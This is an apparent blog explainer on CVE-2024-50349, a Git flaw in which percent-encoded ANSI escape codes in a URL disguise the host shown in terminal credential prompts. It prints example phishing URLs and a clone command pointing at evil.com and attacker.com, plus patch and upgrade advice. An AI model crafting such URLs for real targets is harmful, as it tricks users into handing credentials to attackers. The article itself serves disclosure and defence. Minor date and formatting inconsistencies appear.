CVE-2024-50349 - How Hidden Terminal Codes in Git URLs Can Steal Your Credentials

Git is the backbone of modern software development, powering version control for millions of projects worldwide. With its speed, flexibility, and broad adoption, it’s easy to forget that even trusted tools can have dangerous security holes. In early 2024, a serious vulnerability—CVE-2024-50349—was discovered in Git that exposed users to phishing when they used terminal-based credential prompts. Let’s break down how this attack works, how it could affect you, and what you need to do to stay protected.

The Problem: How Git Prints Out Hostnames in the Terminal

When Git needs a username or password (for HTTPS repositories, for example), it often asks directly in your terminal. To help you know where your credentials are going, Git prints the destination host:

Username for 'https://example.com';: 

But not everyone knows that the prompt could be manipulated. Git decodes any URL-encoded characters before displaying this host information, meaning those special codes in the URL become readable characters in your terminal.

That’s usually just a technicality—unless someone sneaks in something more malicious.

ANSI Escape Codes: What’s So Dangerous?

Terminals support ANSI escape codes, which can change how text looks or even move your cursor around. Attackers can inject these codes so that what you see isn’t what’s actually happening.

Imagine the URL in your .git/config looks like this

[url "https://evil.com;ESCAPE_SEQUENCE";]
    insteadOf = https://trusted.com

When you try to push or pull, Git decodes the URL, and your terminal interprets the escape codes. This might clear the terminal line, overwrite the hostname, or hide what’s really happening—so it looks like you’re sending credentials to GitHub, but you’re really giving them to someone else.

The URL contains an ANSI code (\0332K, for "erase line")

https://user@evil.com%1b%5b2Kgithub.com/foo/bar.git
Git decodes %1b%5b2K to \033[2K. When the terminal sees \033[2K, it wipes the current input line. Now:

Username for 'https://evil.comgithub.com/foo/bar.git';:

But what actually appears might only be

Username for 'https://github.com/foo/bar.git';:

So you think you’re at GitHub, not an attacker’s site!

1. Malicious Cloning

The attacker shares a repository URL with an embedded escape sequence that wipes or alters the terminal line:

git clone "https://attacker.com%1b[2Kgithub.com/repo.git";

When you interact

Username for 'https://attacker.comgithub.com/repo.git';:

But the escape code means you see

Username for 'https://github.com/repo.git';:

You type your password, thinking you’re safe— but your secret is sent to the attacker.

All Git users on terminals: Especially if you’re cloning from unknown or untrusted sources.

- Scripts and CI systems: If you handle raw URLs, you might get phished or have credentials stolen automatically.

Official Patch

The fix was introduced in these [commits (7725b81) and c903985. Check the original bug report for details.

Upgrade using your package manager

# Ubuntu / Debian
sudo apt-get update && sudo apt-get install git

# macOS (Homebrew)
brew upgrade git

References & Further Reading

- CVE-2024-50349 - NVD
- Upstream Security Advisory
- Official Git Release Notes
- What are ANSI escape codes? (Wikipedia)

Final Words

CVE-2024-50349 is a reminder: even secure tools can be tricked in creative ways. Always keep your tools up to date, double-check unknown URLs, and don’t assume your terminal faithfully reports the truth. Protect your credentials—upgrade Git now!

Timeline

Published on: 01/14/2025 19:15:32 UTC
Last modified on: 01/21/2025 17:15:14 UTC